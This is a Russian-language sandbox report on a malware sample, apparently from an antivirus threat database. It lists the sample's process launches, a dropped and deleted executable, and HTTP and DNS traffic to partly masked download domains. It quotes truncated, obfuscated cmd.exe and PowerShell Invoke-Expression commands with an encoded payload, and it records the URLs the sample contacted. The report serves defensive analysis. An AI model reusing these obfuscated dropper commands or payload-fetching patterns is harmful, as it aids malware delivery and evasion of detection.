Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' DGwcCCfYzW ZPproWDovCOhIQiOifjXiiLh LauziMijSVQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AlRnLkanaQRlhwr%=hrmQMdpbcmMN&&set %QpmjIHZzMWwJ%=p&&set %NLGqwLnj...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\267743.exe
Удаляет следующие файлы
- C:\users\public\267743.exe
Сетевая активность
Подключается к
- 'ne###ribe.jp':80
- 'mt##t.ro':80
- 'he####gevillage.ca':80
- 'vi####emorylane.ca':80
- 'vi####emorylane.ca':443
- 'id##en.com':80
TCP
Запросы HTTP GET
- http://ne###ribe.jp/vDjAb/
- http://cd#.##t-tribe.jp/404.html
- http://mt##t.ro/BO2c/
- http://he####gevillage.ca/Fl5Ze/
- http://vi####emorylane.ca/Fl5Ze/
- http://id##en.com/O5gMuYH/
Другие
- 'he####gevillage.ca':443
UDP
- DNS ASK ne###ribe.jp
- DNS ASK cd#.##t-tribe.jp
- DNS ASK xn#####yd1cy656a.net
- DNS ASK mt##t.ro
- DNS ASK he####gevillage.ca
- DNS ASK vi####emorylane.ca
- DNS ASK id##en.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' DGwcCCfYzW ZPproWDovCOhIQiOifjXiiLh LauziMijSVQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AlRnLkanaQRlhwr%=hrmQMdpbcmMN&&set %QpmjIHZzMWwJ%=p&&set %NLGqwLnj...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .('I'+'nv'+'oKe'+'-E'+'XPreSSIo'+'N') ( ( .('New-O'+'bjEc'+'t') ('Ma'+'n'+'AGemeNt.'+'AUtomA'+'TIOn.PscReDEnT'+'iAl') ' ',('76492d1116743f0423413b16050a5345MgB8ADMAMQBTAE8AVAAwAHIAcwBXACsAWQ...
